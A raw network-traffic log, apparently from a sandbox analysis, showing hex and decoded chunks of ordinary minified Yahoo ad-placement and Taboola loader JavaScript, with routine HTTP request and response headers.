                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 73 29 7b 66 6f 72 28 76 61 72 20 6f 2c 69 3d 5b 5d 2c 61 3d 63 2e 70 61 67 65 6c 6f 61 64 4e 6f 6e 43 6f 6c 6c 61 70 73 65 64 41 64 73 2c 73 3d 30 2c 72 3d 5b 22 4c 52 45 43 22 2c 22 4d 41 53 54 22 2c 22 4c 44 52 42 22 2c 22 55 42 41 4c 44 52 42 22 2c 22 55 42 41 4c 52 45 43 22 2c 22 55 42 41 4c 52 45 43 32 22 2c 22 55 42 41 4c 52 45 43 33 22 5d 3b 73 3c 72 2e 6c 65 6e 67 74 68 3b 73 2b 2b 29 7b 76 61 72 20 66 3d 72 5b 73 5d 2c 75 3d 66 3b 69 66 28 61 2e 69 6e 64 65 78 4f 66 28 66 29 3e 3d 30 29 7b 66 2e 69 6e 63 6c 75 64 65 73 28 22 55 42 41 22 29 26 26 28 75 3d 66 2e 73 70 6c 69 74 28 22 55 42 41 22 29 5b 31 5d 29 3b 76 61 72 20 76 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 43 2b 75 29 3b 76 26 26 6e 28 76 29 26 26 69 2e 70 75 73 68 28 66 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s){for(var o,i=[],a=c.pageloadNonCollapsedAds,s=0,r=["LREC","MAST","LDRB","UBALDRB","UBALREC","UBALREC2","UBALREC3"];s<r.length;s++){var f=r[s],u=f;if(a.indexOf(f)>=0){f.includes("UBA")&&(u=f.split("UBA")[1]);var v=d.getElementById(C+u);v&&n(v)&&i.push(f)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 6c 61 73 73 4e 61 6d 65 28 79 29 3b 69 66 28 6e 26 26 6e 2e 6c 65 6e 67 74 68 3e 30 29 7b 6c 2e 72 65 70 6c 61 63 65 57 69 74 68 28 6e 5b 30 5d 29 3b 76 61 72 20 6f 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 79 29 3b 6f 26 26 6f 2e 6c 65 6e 67 74 68 3e 30 26 26 28 6c 3d 6f 5b 30 5d 2c 63 2e 77 61 66 65 72 2e 62 61 73 65 2e 73 79 6e 63 28 6c 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 29 7d 7d 7d 29 29 7d 7d 28 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 2c 6e 29 7b 76 61 72 20 6f 2c 69 2c 61 3d 76 2e 63 6f 6e 74 65 78 74 2c 73 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 2e 62 75 63 6b 65 74 29 3f 61 2e 62 75 63 6b 65 74 2e 6a 6f 69 6e 28 22 2c 22 29 3a 61 2e 62 75 63 6b 65 74 2c 72 3d 7b 70 67 3a 7b 64 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: lassName(y);if(n&&n.length>0){l.replaceWith(n[0]);var o=d.getElementsByClassName(y);o&&o.length>0&&(l=o[0],c.wafer.base.sync(l.parentElement))}}}))}}()}}}function T(e,t,n){var o,i,a=v.context,s=Array.isArray(a.bucket)?a.bucket.join(","):a.bucket,r={pg:{de
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 75 74 69 6c 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 66 69 72 65 42 65 61 63 6f 6e 29 26 26 63 2e 77 61 66 65 72 2e 75 74 69 6c 73 2e 66 69 72 65 42 65 61 63 6f 6e 28 6f 29 7d 6d 3f 4f 28 29 3a 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 64 61 72 6c 61 52 65 61 64 79 4f 6e 41 73 79 6e 63 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4f 28 29 7d 29 29 7d 3b 76 61 72 20 72 2c 6c 2c 63 3d 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 74 72 61 6e 73 66 6f 72 6d 44 61 72 6c 61 43 6f 6e 66 54 6f 4a 61 63 3d 74 2e 73 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: d 0===t?void 0:t.utils)||void 0===n?void 0:n.fireBeacon)&&c.wafer.utils.fireBeacon(o)}m?O():c.addEventListener("darlaReadyOnAsync",(function(){O()}))};var r,l,c=(function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.transformDarlaConfToJac=t.si
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 6e 26 26 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 77 69 64 74 68 2e 6d 69 6e 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2e 66 6c 65 78 2e 77 2e 6d 69 6e 29 2c 31 30 29 29 2c 65 2e 66 6c 65 78 2e 77 2e 6d 61 78 26 26 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 77 69 64 74 68 2e 6d 61 78 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2e 66 6c 65 78 2e 77 2e 6d 61 78 29 2c 31 30 29 29 29 2c 65 2e 66 6c 65 78 2e 68 3f 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 68 65 69 67 68 74 3d 7b 65 6e 61 62 6c 65 64 3a 21 30 7d 2c 65 2e 66 6c 65 78 2e 68 2e 6d 69 6e 26 26 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 68 65 69 67 68 74 2e 6d 69 6e 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2e 66 6c 65 78 2e 68 2e 6d 69 6e 29 2c 31 30 29 29 2c 65 2e 66 6c 65 78 2e 68 2e 6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: n&&(o.flexible.width.min=parseInt(String(e.flex.w.min),10)),e.flex.w.max&&(o.flexible.width.max=parseInt(String(e.flex.w.max),10))),e.flex.h?(o.flexible.height={enabled:!0},e.flex.h.min&&(o.flexible.height.min=parseInt(String(e.flex.h.min),10)),e.flex.h.m
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 65 2e 6c 65 6e 67 74 68 3b 29 6f 2b 2b 2c 69 3d 65 2e 63 68 61 72 41 74 28 6f 29 2c 74 3d 21 30 3b 74 26 26 6f 2d 2d 7d 7d 2c 73 3d 6e 3d 3e 7b 69 66 28 6f 2b 31 3c 65 2e 6c 65 6e 67 74 68 29 7b 66 6f 72 28 69 3d 65 2e 63 68 61 72 41 74 28 6f 2b 31 29 2c 6f 2b 2b 3b 69 21 3d 3d 6e 26 26 6f 2b 31 3c 65 2e 6c 65 6e 67 74 68 3b 29 74 2b 3d 69 2c 69 3d 65 2e 63 68 61 72 41 74 28 6f 2b 31 29 2c 6f 2b 2b 3b 69 21 3d 3d 6e 26 26 28 74 2b 3d 69 29 7d 7d 3b 66 6f 72 28 6f 3d 30 3b 6f 3c 65 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 69 3d 65 2e 63 68 61 72 41 74 28 6f 29 2c 22 3d 22 3d 3d 3d 69 3f 28 74 26 26 28 6e 2e 70 75 73 68 28 74 29 2c 74 3d 22 22 29 2c 61 28 29 29 3a 27 22 27 3d 3d 3d 69 3f 28 74 26 26 28 6e 2e 70 75 73 68 28 74 29 2c 74 3d 22 22 29 2c 73 28 27 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: e.length;)o++,i=e.charAt(o),t=!0;t&&o--}},s=n=>{if(o+1<e.length){for(i=e.charAt(o+1),o++;i!==n&&o+1<e.length;)t+=i,i=e.charAt(o+1),o++;i!==n&&(t+=i)}};for(o=0;o<e.length;o++)i=e.charAt(o),"="===i?(t&&(n.push(t),t=""),a()):'"'===i?(t&&(n.push(t),t=""),s('"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 66 6f 72 6d 44 61 72 6c 61 50 6f 73 69 74 69 6f 6e 43 6f 6e 66 54 6f 4a 61 63 29 28 6e 29 3b 6f 26 26 28 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 26 26 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 2e 68 6f 73 74 55 52 4c 7c 7c 21 67 7c 7c 28 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 7c 7c 28 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 3d 7b 68 6f 73 74 55 52 4c 3a 22 22 7d 29 2c 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 2e 68 6f 73 74 55 52 4c 3d 67 29 2c 28 30 2c 74 2e 75 70 64 61 74 65 52 6f 74 61 74 69 6f 6e 43 6f 6e 66 46 72 6f 6d 41 75 74 6f 45 76 65 6e 74 29 28 75 2c 65 2c 6f 2e 63 6c 69 65 6e 74 29 2c 64 2e 73 65 72 76 69 63 65 2e 70 6f 73 69 74 69 6f 6e 73 5b 65 5d 3d 6f 2e 73 65 72 76 69 63 65 2c 64 2e 63 6c 69 65 6e 74 2e 70 6f 73 69 74 69 6f 6e 73 5b 65 5d 3d 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: formDarlaPositionConfToJac)(n);o&&(o.client.meta&&o.client.meta.hostURL||!g||(o.client.meta||(o.client.meta={hostURL:""}),o.client.meta.hostURL=g),(0,t.updateRotationConfFromAutoEvent)(u,e,o.client),d.service.positions[e]=o.service,d.client.positions[e]=o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 69 6e 65 72 22 29 29 26 26 28 76 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 48 74 2d 70 6c 2d 4c 44 52 42 22 29 7c 7c 76 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 48 74 2d 70 6c 2d 4c 52 45 43 22 29 29 26 26 76 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 48 74 2d 70 6c 2d 4c 44 52 42 22 2c 22 48 74 2d 70 6c 2d 4c 52 45 43 22 29 7d 76 61 72 20 70 3d 6e 75 6c 6c 3d 3d 3d 28 6f 3d 61 2e 72 65 73 70 6f 6e 73 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 70 6f 73 69 74 69 6f 6e 73 3b 69 66 28 70 26 26 70 2e 4d 4f 4e 32 26 26 70 2e 4c 52 45 43 33 26 26 70 2e 4c 52 45 43 34 29 7b 76 61 72 20 6d 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 70 2e 4d 4f 4e 32 2e 63 6f 6e 74 65 6e 74 29 7c 7c 76 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: iner"))&&(v.classList.contains("Ht-pl-LDRB")||v.classList.contains("Ht-pl-LREC"))&&v.classList.remove("Ht-pl-LDRB","Ht-pl-LREC")}var p=null===(o=a.response)||void 0===o?void 0:o.positions;if(p&&p.MON2&&p.LREC3&&p.LREC4){var m=null===(i=p.MON2.content)||vo


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    89192.168.2.449856151.101.1.444434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC545OUTGET /libtrc/yahooweb-network/loader.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: cdn.taboola.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 1423863
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: gjd3RpiS4W+bW2vM8yRNCn3VsVboO7Pqr5TmAst5BfSp0MNfkocifUaP6Hcyb/C9AM0gIDFDi5c=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: FPSBEANKKX0YRZG9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-replication-status: FAILED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 13:26:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "15d3f856b78470a7baf99b6865760aaf"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: Yaz5q8SKC8PmBN0jlFxM.gu5F7QyxC_D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 4285
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Served-By: cache-ewr-kewr1740029-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Timer: S1727716861.046029,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: private,max-age=14401
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    abp: 86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1378INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 36 33 33 37 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 69 66 28 22 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 22 69 6e 20 77 69 6e 64 6f 77 26 26 22 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 45 6e 74 72 79 22 69 6e 20 77 69 6e 64 6f 77 26 26 22 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 61 74 69 6f 22 69 6e 20 77 69 6e 64 6f 77 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 45 6e 74 72 79 2e 70 72 6f 74 6f 74 79 70 65 29 22 69 73 49 6e 74 65 72 73 65 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (function(){var __webpack_modules__={6337:function(){!function(){"use strict";if("object"==typeof window)if("IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype)"isIntersec
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1378INData Raw: 65 72 44 6f 63 75 6d 65 6e 74 29 2c 30 3d 3d 74 68 69 73 2e 5f 6f 62 73 65 72 76 61 74 69 6f 6e 54 61 72 67 65 74 73 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 5f 75 6e 72 65 67 69 73 74 65 72 49 6e 73 74 61 6e 63 65 28 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 63 6f 6e 6e 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 6f 62 73 65 72 76 61 74 69 6f 6e 54 61 72 67 65 74 73 3d 5b 5d 2c 74 68 69 73 2e 5f 75 6e 6d 6f 6e 69 74 6f 72 41 6c 6c 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 28 29 2c 74 68 69 73 2e 5f 75 6e 72 65 67 69 73 74 65 72 49 6e 73 74 61 6e 63 65 28 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 74 61 6b 65 52 65 63 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 71 75 65 75 65 64 45 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: erDocument),0==this._observationTargets.length&&this._unregisterInstance()},a.prototype.disconnect=function(){this._observationTargets=[],this._unmonitorAllIntersections(),this._unregisterInstance()},a.prototype.takeRecords=function(){var e=this._queuedEn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1378INData Raw: 65 2e 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 6f 29 2c 73 28 65 2c 22 72 65 73 69 7a 65 22 2c 69 2c 21 30 29 29 2c 73 28 74 2c 22 73 63 72 6f 6c 6c 22 2c 69 2c 21 30 29 2c 61 26 26 61 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 7d 29 29 3b 76 61 72 20 63 3d 74 68 69 73 2e 72 6f 6f 74 26 26 28 74 68 69 73 2e 72 6f 6f 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 68 69 73 2e 72 6f 6f 74 29 7c 7c 65 3b 69 66 28 74 21 3d 63 29 7b 76 61 72 20 64 3d 72 28 74 29 3b 64 26 26 74 68 69 73 2e 5f 6d 6f 6e 69 74 6f 72 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 28 64 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 7d 7d 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 75 6e 6d 6f 6e 69 74 6f 72 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: e.clearInterval(o),s(e,"resize",i,!0)),s(t,"scroll",i,!0),a&&a.disconnect()}));var c=this.root&&(this.root.ownerDocument||this.root)||e;if(t!=c){var d=r(t);d&&this._monitorIntersections(d.ownerDocument)}}},a.prototype._unmonitorIntersections=function(t){v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1378INData Raw: 2e 65 6e 74 72 79 3d 6e 65 77 20 6f 28 7b 74 69 6d 65 3a 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 2c 74 61 72 67 65 74 3a 72 2c 62 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 3a 61 2c 72 6f 6f 74 42 6f 75 6e 64 73 3a 75 2c 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 65 63 74 3a 64 7d 29 3b 73 3f 65 26 26 6c 3f 74 68 69 73 2e 5f 68 61 73 43 72 6f 73 73 65 64 54 68 72 65 73 68 6f 6c 64 28 73 2c 70 29 26 26 74 68 69 73 2e 5f 71 75 65 75 65 64 45 6e 74 72 69 65 73 2e 70 75 73 68 28 70 29 3a 73 26 26 73 2e 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 26 26 74 68 69 73 2e 5f 71 75 65 75 65 64 45 6e 74 72 69 65 73 2e 70 75 73 68 28 70 29 3a 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .entry=new o({time:window.performance&&performance.now&&performance.now(),target:r,boundingClientRect:a,rootBounds:u,intersectionRect:d});s?e&&l?this._hasCrossedThreshold(s,p)&&this._queuedEntries.push(p):s&&s.isIntersecting&&this._queuedEntries.push(p):t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1378INData Raw: 2c 6c 65 66 74 3a 30 2c 72 69 67 68 74 3a 69 2e 63 6c 69 65 6e 74 57 69 64 74 68 7c 7c 72 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 77 69 64 74 68 3a 69 2e 63 6c 69 65 6e 74 57 69 64 74 68 7c 7c 72 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 62 6f 74 74 6f 6d 3a 69 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7c 7c 72 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2c 68 65 69 67 68 74 3a 69 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7c 7c 72 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7d 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 65 78 70 61 6e 64 52 65 63 74 42 79 52 6f 6f 74 4d 61 72 67 69 6e 28 74 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 65 78 70 61 6e 64 52 65 63 74 42 79 52 6f 6f 74 4d 61 72 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,left:0,right:i.clientWidth||r.clientWidth,width:i.clientWidth||r.clientWidth,bottom:i.clientHeight||r.clientHeight,height:i.clientHeight||r.clientHeight}}return this._expandRectByRootMargin(t)},a.prototype._expandRectByRootMargin=function(e){var t=this._
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1378INData Raw: 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 3d 64 28 65 2e 62 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 29 2c 74 68 69 73 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 65 63 74 3d 64 28 65 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 65 63 74 7c 7c 7b 74 6f 70 3a 30 2c 62 6f 74 74 6f 6d 3a 30 2c 6c 65 66 74 3a 30 2c 72 69 67 68 74 3a 30 2c 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 7d 29 2c 74 68 69 73 2e 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 3d 21 21 65 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 65 63 74 3b 76 61 72 20 74 3d 74 68 69 73 2e 62 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 2c 6e 3d 74 2e 77 69 64 74 68 2a 74 2e 68 65 69 67 68 74 2c 69 3d 74 68 69 73 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 65 63 74 2c 72 3d 69 2e 77 69 64 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: dingClientRect=d(e.boundingClientRect),this.intersectionRect=d(e.intersectionRect||{top:0,bottom:0,left:0,right:0,width:0,height:0}),this.isIntersecting=!!e.intersectionRect;var t=this.boundingClientRect,n=t.width*t.height,i=this.intersectionRect,r=i.widt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1378INData Raw: 3b 74 72 79 7b 74 3d 65 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 74 3f 28 74 2e 77 69 64 74 68 26 26 74 2e 68 65 69 67 68 74 7c 7c 28 74 3d 7b 74 6f 70 3a 74 2e 74 6f 70 2c 72 69 67 68 74 3a 74 2e 72 69 67 68 74 2c 62 6f 74 74 6f 6d 3a 74 2e 62 6f 74 74 6f 6d 2c 6c 65 66 74 3a 74 2e 6c 65 66 74 2c 77 69 64 74 68 3a 74 2e 72 69 67 68 74 2d 74 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 74 2e 62 6f 74 74 6f 6d 2d 74 2e 74 6f 70 7d 29 2c 74 29 3a 7b 74 6f 70 3a 30 2c 62 6f 74 74 6f 6d 3a 30 2c 6c 65 66 74 3a 30 2c 72 69 67 68 74 3a 30 2c 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 72 65 74 75 72 6e 21 65 7c 7c 22 78 22 69 6e 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ;try{t=e.getBoundingClientRect()}catch(e){}return t?(t.width&&t.height||(t={top:t.top,right:t.right,bottom:t.bottom,left:t.left,width:t.right-t.left,height:t.bottom-t.top}),t):{top:0,bottom:0,left:0,right:0,width:0,height:0}}function d(e){return!e||"x"in
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1378INData Raw: 7b 76 61 72 20 74 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 74 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 29 7b 76 61 72 20 72 3d 65 2e 6c 65 6e 67 74 68 2c 6f 3d 6e 65 77 20 41 72 72 61 79 28 72 29 3b 69 66 28 30 3d 3d 3d 72 29 72 65 74 75 72 6e 20 6e 28 6f 29 3b 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 28 65 5b 6e 5d 2c 6e 29 7d 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 74 2e 72 65 73 6f 6c 76 65 28 65 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 61 5d 3d 65 2c 30 3d 3d 2d 2d 72 26 26 6e 28 6f 29 7d 29 2c 69 29 7d 29 29 7d 29 29 7d 2c 74 2e 72 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {var t=this;return new t((function(n,i){var r=e.length,o=new Array(r);if(0===r)return n(o);!function(e,t){for(var n=0;n<e.length;n++)t(e[n],n)}(e,(function(e,a){t.resolve(e).then((function(e){o[a]=e,0==--r&&n(o)}),i)}))}))},t.race=function(e){var t=this;r
